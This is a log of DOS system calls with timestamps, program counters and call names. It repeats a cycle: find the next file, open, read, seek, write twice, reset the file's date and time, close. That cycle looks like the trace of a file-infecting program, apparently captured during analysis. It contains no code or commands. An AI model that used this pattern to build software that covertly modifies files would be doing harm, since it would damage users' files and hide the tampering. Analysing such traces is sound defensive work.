2018-12-25T11:46:32.62914724Z 87 PC: 12ade | Get or set file date and time
2018-12-25T11:46:32.632565087Z 62 PC: 12ae2 | Close file
2018-12-25T11:46:32.641553027Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.645588133Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.654425176Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.662825414Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.6648244Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.668248507Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.670775282Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.674103709Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.675838011Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.684828889Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.68831159Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.696006231Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.705312751Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.707260535Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.711493217Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.714042296Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.717856565Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.719906405Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.730116449Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.735416796Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.742702538Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.751020954Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.75293987Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.756005182Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.75801752Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.76194416Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.763909032Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:32.891934832Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:32.896779359Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:32.905548412Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:32.913530225Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:32.916647516Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:32.920028376Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:32.9219618Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:32.925939497Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:32.927989931Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.0971828Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.10178847Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.110155815Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.118193209Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.120194399Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.429833407Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.431497365Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.439428466Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.441953229Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.45058767Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.453482345Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.461512813Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.469036219Z 66 PC: 12b5b | Move file pointer (See above)
2018-12-25T11:46:33.470353473Z 64 PC: 12b66 | Write file or device (See above)
2018-12-25T11:46:33.473880608Z 66 PC: 12b72 | Move file pointer (See above)
2018-12-25T11:46:33.475417993Z 64 PC: 12b7d | Write file or device (See above)
2018-12-25T11:46:33.478457625Z 87 PC: 12ade | Get or set file date and time (See above)
2018-12-25T11:46:33.4804353Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.489182973Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.492264439Z 61 PC: 12afc | Open file (See above)
2018-12-25T11:46:33.500867761Z 63 PC: 12b20 | Read file or device (See above)
2018-12-25T11:46:33.504791763Z 62 PC: 12ae2 | Close file (See above)
2018-12-25T11:46:33.506838784Z 79 PC: 12abc | Find next file (See above)
2018-12-25T11:46:33.510036418Z 26 PC: 12ac5 | Set disk transfer address